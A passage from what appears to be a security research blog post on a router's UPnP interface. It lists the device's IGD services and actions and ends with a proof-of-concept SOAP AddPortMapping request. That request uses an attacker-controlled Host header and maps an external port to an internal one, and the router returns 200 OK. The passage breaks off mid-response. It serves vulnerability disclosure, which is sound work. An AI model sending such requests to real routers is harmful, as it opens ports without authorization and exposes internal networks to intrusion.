margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/WANCableLinkConfig</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: </span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/WAN/wancablelinkconfigSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> [<span class="cm-operator" style="box-sizing: border-box;">+</span>] Actions:</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetCableLinkConfigInfo</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetDownstreamFrequency</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetDownstreamModulation</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetUpstreamFrequency</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetUpstreamModulation</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetUpstreamChannelID</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetUpstreamPowerLevel</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetBPIEncryptionEnabled</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetConfigFile</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTFTPServer</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:WANEthernetLinkConfig:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:wanetherlinkconfig1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/WANEthernetLinkConfig</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: /event/WANEthernetLinkConfig</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/WAN/wanethernetlinkconfigSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> [<span class="cm-operator" style="box-sizing: border-box;">+</span>] Actions:</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetEthernetLinkStatus</span></pre></div></div><div><br /></div><div><p style="text-align: justify;">The “<b>AddPortMapping</b>” action of the “<b>WANConnectionDevice</b>” service is regularly present in the implemented IGD Profile.</p><p style="text-align: justify;">Moreover, as shown in the HTTP request and response below, the router doesn't validate the Host header because it regularly returns a 200 response even if the value "<i>attacker.mindedsecurity.com</i>" is inserted within the Host header.</p></div><p style="text-align: justify;">Request:</p><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;">/control/WANIPConnection</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">HTTP/1.1</span></span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> attacker.mindedsecurity</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">SOAPAction:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> text/xml; charset="utf-8"</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> 714</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><?xml version="1.0"?></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <s:Body></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewRemoteHost></NewRemoteHost></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewExternalPort>8989</NewExternalPort></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewProtocol>TCP</NewProtocol></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewInternalPort>80</NewInternalPort></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewInternalClient>192.168.1.1</NewInternalClient></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewEnabled>1</NewEnabled></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewPortMappingDescription>UPnP port mapping PoC</NewPortMappingDescription></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <NewLeaseDuration>0</NewLeaseDuration></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </u:AddPortMapping></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </s:Body></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"></s:Envelope></span></pre></div><p style="text-align: left;">Response:</p><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #50e650;">200</span> OK</span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> text/xml; charset="utf-8"</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> close</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;"> 298</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 